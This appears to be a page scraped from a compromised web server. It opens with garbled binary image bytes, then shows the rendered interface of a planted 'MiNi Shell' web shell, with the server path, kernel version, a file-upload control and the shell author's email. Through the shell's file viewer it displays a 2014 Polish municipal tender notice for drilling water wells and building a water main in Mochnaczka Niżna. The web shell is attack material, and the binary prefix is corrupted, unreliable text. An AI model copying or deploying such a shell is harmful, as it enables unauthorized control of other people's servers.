JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140801/257076-N-2014.html

<p class="kh_header"><b>Krynica-Zdrój: Wiercenie ogólnodostępnych studni eksploatacyjnych dla ludności wraz z infrastrukturą towarzyszącą oraz budowa sieci wodociągowej zasilającej wodociąg dla osiedla Jakubik w Mochnaczce Niżnej</b><br>
<b>Numer ogłoszenia: 257076 - 2014; data zamieszczenia: 01.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krynica-Zdrój, działająca poprzez jednostkę organizacyjną - Zakład Wodociągów i Kanalizacji w Krynicy-Zdroju , ul. Kraszewskiego 37, 33-380 Krynica-Zdrój, woj. małopolskie, tel. 18 472 52 76, faks 18 472 52 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik-krynica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wiercenie ogólnodostępnych studni eksploatacyjnych dla ludności wraz z infrastrukturą towarzyszącą oraz budowa sieci wodociągowej zasilającej wodociąg dla osiedla Jakubik w Mochnaczce Niżnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Część I zamówienia:
1)	wykonanie otworów poszukiwawczo-rozpoznawczych w utworach paleogenu na terenie gminy Krynica-Zdrój w celu ujęcia wody dla potrzeb Zakładu Wodociągów i Kanalizacji w Krynicy-Zdroju w miejscowości Berest, Mochnaczka Niżna, Krynica-Zdrój, Tylicz i Muszynka, gm. Krynica-Zdrój. Zakres zamówienia obejmuje m.in.:
a)	Opracowanie planu ruchu zakładu górniczego;
b)	Wykonanie pięciu otworów poszukiwawczo-rozpoznawczych: B-1, Mo-1, K-1, T-1, Mu-1 do głębokości 80,0 m p.p.t;
c)	Pompowanie oczyszczające otworów B-1, Mo-1, K-1, T-1, Mu-1 do czasu uzyskania czystej wody, bez zawiesiny (ok. 24h);
d)	Pompowanie pomiarowe otworów;
e)	Wykonanie prac geodezyjnych;
f)	Wykonanie dokumentacji hydrogeologicznej (w 5 egzemplarzach) ustalającej zasoby eksploatacyjne ujęcia wód podziemnych (oddzielnie dla każdego z otworów) spełniającej wymagania określone w art. 90 ust. 2 ustawy z dnia 9 czerwca 2011 r. - Prawo geologiczne i górnicze (tekst jednolity Dz. U. z 2014 r., poz. 613 z późn. zm.) oraz w Rozporządzeniu Ministra Środowiska z dnia 8 maja 2014 r. w sprawie wymagań, jakim powinny odpowiadać dokumentacje hydrogeologiczne i geologiczno-inżynierskie (Dz. U. z 2014 r., poz. 596).
Prace geologiczne powinny być prowadzone pod stałym nadzorem uprawnionego geologa na podstawie zatwierdzonego planu ruchu zakładu górniczego.
2)	Wykonawca w ramach niniejszego zamówienia zobowiązany będzie (w przypadku otworów które będą spełniać wymagania w zakresie wydajności) do zaprojektowania i wykonania infrastruktury towarzyszącej dla wykonanych otworów tj. pomp, zasilania elektrycznego, wodociągów łączących otwory z istniejącą siecią wodociągową. W zakresie zamówienia przewiduje się:
a)	Wykonanie dokumentacji projektowej w zakresie umożliwiającym uzyskanie pozwolenia na budowę oraz wykonanie robót budowlanych; dokumentację należy wykonać w oparciu o program funkcjonalno-użytkowy (PFU),
b)	Wykonanie zaprojektowanych obiektów w zakresie umożliwiającym uzyskanie, zgodnie z przepisami Prawa budowlanego, pozwolenia na użytkowanie oraz użytkowanie wybudowanych obiektów zgodnie z ich przeznaczeniem.
W zakresie zamierzenia budowlanego wchodzi:
-	wykonanie obudowy zabezpieczającej dla wykonanych otworów,
-	wbudowanie pomp do wykonanych otworów,
-	Wykonanie zbiornika wody dla otworu Mo-1 o pojemności 25 m3,
-	wykonanie zasilania otworów w energię elektryczną,
-	wybudowanie odcinków wodociągu łączących otwory z siecią wodociągową,
-	wykonanie sterowania,
-	wykonanie ogrodzenia dla otworu Mo-1.
Część II zamówienia:
3)	Budowa sieci wodociągowej zasilającej osiedle Jakubik w Mochnaczce Niżnej. Zakres zamówienia obejmuje wykonanie sieci wodociągowej z rur PE 100 SDR 11 o średnicy 110 mm i długości 1 789 m wraz z robotami towarzyszącymi.
2.	Harmonogram realizacji robót:
1)	Wykonanie otworów poszukiwawczo-rozpoznawczych wraz z opracowaniem dokumentacji hydrogeologicznej - 01.09.2014 r. - 30.11.2014 r.;
2)	Opracowanie dokumentacji projektowej oraz wykonanie robót określonych w PFU wraz z uzyskaniem pozwolenia na użytkowanie - 01.12.2014 r. - 30.06.2015 r.
3)	Wykonanie wodociągu dla osiedla Jakubik do 30.06.2015 r.
3.	Szczegółowy opis przedmiotu zamówienia określa:
1)	Projekt robót geologicznych (załącznik Nr 1 do SIWZ), przedmiar robót (załącznik Nr 2 do SIWZ) oraz specyfikacja techniczna wykonania i odbioru robót budowlanych (załącznik Nr 3 do SIWZ);
2)	Program funkcjonalno użytkowy na zaprojektowanie i wykonanie infrastruktury towarzyszącej dla wykonanych otworów poszukiwawczo-rozpoznawczych (załącznik Nr 4 do SIWZ);
3)	Dokumentacja projektowa wykonania sieci wodociągowej zasilającej osiedle Jakubik w Mochnaczce Niżnej, na którą składa się projekt budowlany (załącznik Nr 5 do SIWZ, przedmiar robót (załącznik Nr 6 do SIWZ) oraz specyfikacja techniczna wykonania i odbioru robót budowlanych (załącznik Nr 7 do SIWZ).
4.	Wszystkie roboty wykonawca zobowiązany jest wykonać zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych, programem funkcjonalno-użytkowym oraz postanowieniami ustawy z dnia 9 czerwca 2011 r.  - Prawo geologiczne i górnicze i ustawy Prawo budowlane wraz z aktami wykonawczymi do tych ustaw.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.12.10.00-1, 45.26.22.20-9, 71.32.00.00-7, 45.23.21.50-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:
1)	2 000,00 zł (słownie: dwa tysiące 00/100) - dla części I zamówienia,
2)	3 000,00 zł (słownie: trzy tysiące złotych 00/100) dla części II zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
Dla części I zamówienia:
- roboty budowlane obejmujące wykonanie co najmniej trzech otworów poszukiwawczo-rozpoznawczych, w celu ujęcia wody, o głębokości nie mniejszej niż 50 m każdy.
Dla części II zamówienia:
- co najmniej 1 robotę budowlaną (zadanie) obejmujące budowę, przebudowę lub modernizację sieci wodociągowej o wartości co najmniej 150 000 zł brutto i długości co najmniej 1 000 mb.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą -
Dla części I zamówienia:
a)	geologiem - do wykonywania, dozorowania i kierowania pracami geologicznymi posiadającą kwalifikacje w kategorii IV lub V, określone w art. 50 ustawy z dnia 9 czerwca 2011 r. - Prawo geologiczne i górnicze (tekst jednolity Dz. U. z 2014 r., poz. 613 z późn. zm.);
b)	do pełnienia funkcji kierownika budowy, posiadającą uprawnienia i kwalifikacje do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych.
Kierownik budowy powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07.07.1994 r. - Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa  z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Dla części II zamówienia:
a)	do pełnienia funkcji kierownika budowy, posiadającą uprawnienia i kwalifikacje do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych.
Kierownik budowy powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07.07.1994 r. - Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa  z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się istotne zmiany treści umowy, które mogą wynikać z następujących okoliczności:
a)	zmiany przepisów prawnych obowiązujących w dniu podpisania umowy,
b)	sytuacji niezależnych od stron umowy lub w przypadku działania siły wyższej, powodującej konieczność wprowadzenia zmian do umowy. Przez działanie siły wyższej należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron umowy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których strony umowy nie mogły przewidzieć i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej,
c)	wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać udokumentowany wpisem kierownika budowy do dziennika budowy oraz zgłoszony niezwłocznie Zamawiającemu,
d)	gdy potrzeba wprowadzenia zmian do umowy wynika ze zmian natury technicznej, w tym zmian dokumentacji projektowej,
e)	wystąpienia istotnego błędu w dokumentacji projektowej - termin umowy może zostać wydłużony o czas niezbędny na usunięcie wad w projekcie przez Wykonawcę dokumentacji projektowej,
f)	zaszła konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów,
g)	prace objęte umową zostały wstrzymane przez właściwe organy, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy,
h)	zmiany części lub zakresu robót jakie Wykonawca zamierzał wykonać przy udziale podwykonawców.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik-krynica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Krynicy-Zdroju, 
ul. Kraszewskiego 37, 33-380 Krynica-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 10:00, miejsce: Zakład Wodociągów i Kanalizacji w Krynicy-Zdroju
ul. Kraszewskiego 37, 33-380 Krynica-Zdrój, II piętro, pokój nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje udzielania
zamówień uzupełniających. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem
aukcji elektronicznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wiercenie ogólnodostępnych studni eksploatacyjnych dla ludności wraz z infrastrukturą towarzyszącą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 1)	wykonanie otworów poszukiwawczo-rozpoznawczych w utworach paleogenu na terenie gminy Krynica-Zdrój w celu ujęcia wody dla potrzeb Zakładu Wodociągów i Kanalizacji w Krynicy-Zdroju w miejscowości Berest, Mochnaczka Niżna, Krynica-Zdrój, Tylicz i Muszynka, gm. Krynica-Zdrój. Zakres zamówienia obejmuje m.in.:
a)	Opracowanie planu ruchu zakładu górniczego;
b)	Wykonanie pięciu otworów poszukiwawczo-rozpoznawczych: B-1, Mo-1, K-1, T-1, Mu-1 do głębokości 80,0 m p.p.t;
c)	Pompowanie oczyszczające otworów B-1, Mo-1, K-1, T-1, Mu-1 do czasu uzyskania czystej wody, bez zawiesiny (ok. 24h);
d)	Pompowanie pomiarowe otworów;
e)	Wykonanie prac geodezyjnych;
f)	Wykonanie dokumentacji hydrogeologicznej (w 5 egzemplarzach) ustalającej zasoby eksploatacyjne ujęcia wód podziemnych (oddzielnie dla każdego z otworów) spełniającej wymagania określone w art. 90 ust. 2 ustawy z dnia 9 czerwca 2011 r. - Prawo geologiczne i górnicze (tekst jednolity Dz. U. z 2014 r., poz. 613 z późn. zm.) oraz w Rozporządzeniu Ministra Środowiska z dnia 8 maja 2014 r. w sprawie wymagań, jakim powinny odpowiadać dokumentacje hydrogeologiczne i geologiczno-inżynierskie (Dz. U. z 2014 r., poz. 596).
Prace geologiczne powinny być prowadzone pod stałym nadzorem uprawnionego geologa na podstawie zatwierdzonego planu ruchu zakładu górniczego.
2)	Wykonawca w ramach niniejszego zamówienia zobowiązany będzie (w przypadku otworów które będą spełniać wymagania w zakresie wydajności) do zaprojektowania i wykonania infrastruktury towarzyszącej dla wykonanych otworów tj. pomp, zasilania elektrycznego, wodociągów łączących otwory z istniejącą siecią wodociągową. W zakresie zamówienia przewiduje się:
a)	Wykonanie dokumentacji projektowej w zakresie umożliwiającym uzyskanie pozwolenia na budowę oraz wykonanie robót budowlanych; dokumentację należy wykonać w oparciu o program funkcjonalno-użytkowy (PFU),
b)	Wykonanie zaprojektowanych obiektów w zakresie umożliwiającym uzyskanie, zgodnie z przepisami Prawa budowlanego, pozwolenia na użytkowanie oraz użytkowanie wybudowanych obiektów zgodnie z ich przeznaczeniem.
W zakresie zamierzenia budowlanego wchodzi:
-	wykonanie obudowy zabezpieczającej dla wykonanych otworów,
-	wbudowanie pomp do wykonanych otworów,
-	Wykonanie zbiornika wody dla otworu Mo-1 o pojemności 25 m3,
-	wykonanie zasilania otworów w energię elektryczną,
-	wybudowanie odcinków wodociągu łączących otwory z siecią wodociągową,
-	wykonanie sterowania,
-	wykonanie ogrodzenia dla otworu Mo-1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.12.10.00-1, 45.26.22.20-9, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa sieci wodociągowej zasilającej wodociąg dla osiedla Jakubik w Mochnaczce Niżnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa sieci wodociągowej zasilającej osiedle Jakubik w Mochnaczce Niżnej. Zakres zamówienia obejmuje wykonanie sieci wodociągowej z rur PE 100 SDR 11 o średnicy 110 mm i długości 1 789 m wraz z robotami towarzyszącymi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.21.50-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com